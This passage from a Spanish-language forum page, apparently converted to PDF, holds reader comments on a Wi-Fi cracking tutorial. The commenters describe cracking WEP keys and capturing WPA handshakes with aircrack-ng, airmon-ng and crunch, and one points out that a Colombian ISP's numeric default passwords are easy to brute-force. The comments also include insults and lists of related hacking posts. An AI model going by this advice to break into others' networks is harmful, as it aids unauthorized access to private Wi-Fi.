Hace poco empecé con la vuelta de crackear redes wifi.. me fabriqué una con una lata de pasta de metal, yuna usb wifi enuwi-n3 de encore, esta tarjetica que a simple vista es un mierda... hace maravillas con la latade metal, inyecta, monitorea, saque una wep en menos de 3 min a 550 packets por segundo, unamiercoles!!, y hasta ahora he sacado dos handshakes, la ventaja es que aqui en colombia los inutiles de etble ponen contraseñas numericas de hasta 14 digitos.... y ps crunch me va de pelambre, muyy bueno man, tedoy +10
@mateitow001 hace más de 9 meses -8
mmm q post mas novato
@dysloke hace más de 9 meses +11
mateitow001 dijo:mmm q post mas novato
no es para gente intelectual como vos que posteás "las cumbias de lady gaga"
@mateitow001 hace más de 9 meses -4
Nerd
@Nicko_94 hace más de 9 meses
mateitow001 dijo:Nerd
A esto si que llamo aporte 77
Excelente post !!! Ya sabia usar aircrack, pero no habia probado crunch, solo john the ripper...Eso si una correccion: el modo monitor solo se puede poner a traves de airmon-ng, airodump-ng es un snifferque captura paquetes, pero no pone ese modo solo ni mucho menos. Si pudieras poner un video ilustrativocon un pc comun "de simples mortales" se agradeceria, ademas de evitar el infaltable: "por que tu crackeasa 1500 k/s y yo solo a 500? tienes un i1000??" xD
@washimosfet hace más de 9 meses
un post de un haceker es lo que es muchas gracias a favs, solo sirve en linux , bueno a probrarlo
@CodigoMalicioso hace más de 9 meses
washimosfet dijo:un post de un haceker es lo que es muchas gracias a favs, solo sirve en linux , bueno aprobrarlo
un hacker?, donde???
@Insufactus666 hace más de 9 meses -7
INTENTE PROBARLO CON MI RED, Y DEFINITIVAMENTE NO SIRVIO, DETALLES DE MI RED, WPA2-ENTERPRISE, ENCRIPTACION AES, 32 CARACTERES, CON MINUSCULAS, MAYUSCULAS, NUMEROS,SIMBOLOS, FILTRADO IP Y MAC..
1 2
RelacionadosHasta un tonto puede descifrar claves WPA
clave wpa o wpa2 (funciona en mexico para cablevision)
Querias localizar señales wifi? Mirá!
converted by Web2PDFConvert.com
Anuncios Google WPA Handshake Linux Laptop Hackear Redes WiFi
Ir al cieloBuscar...
Anunciar Ayuda Protocolo Desarrolladores Denuncias Report Abuse - DMCA Términos y condiciones Privacidad de datos Buscar amigos
Hackear Wifi en 3min. Ubuntu [incluye RTL8187b]
DOS en una red Wireless [BackTrack]
Aumenta el Rango de emsion de tu Wireless
Problemas de acceso a internet por wireless con windows 7
Configurar Wireless en GNU/Linux Debian 6.0 Squeeze
converted by Web2PDFConvert.com
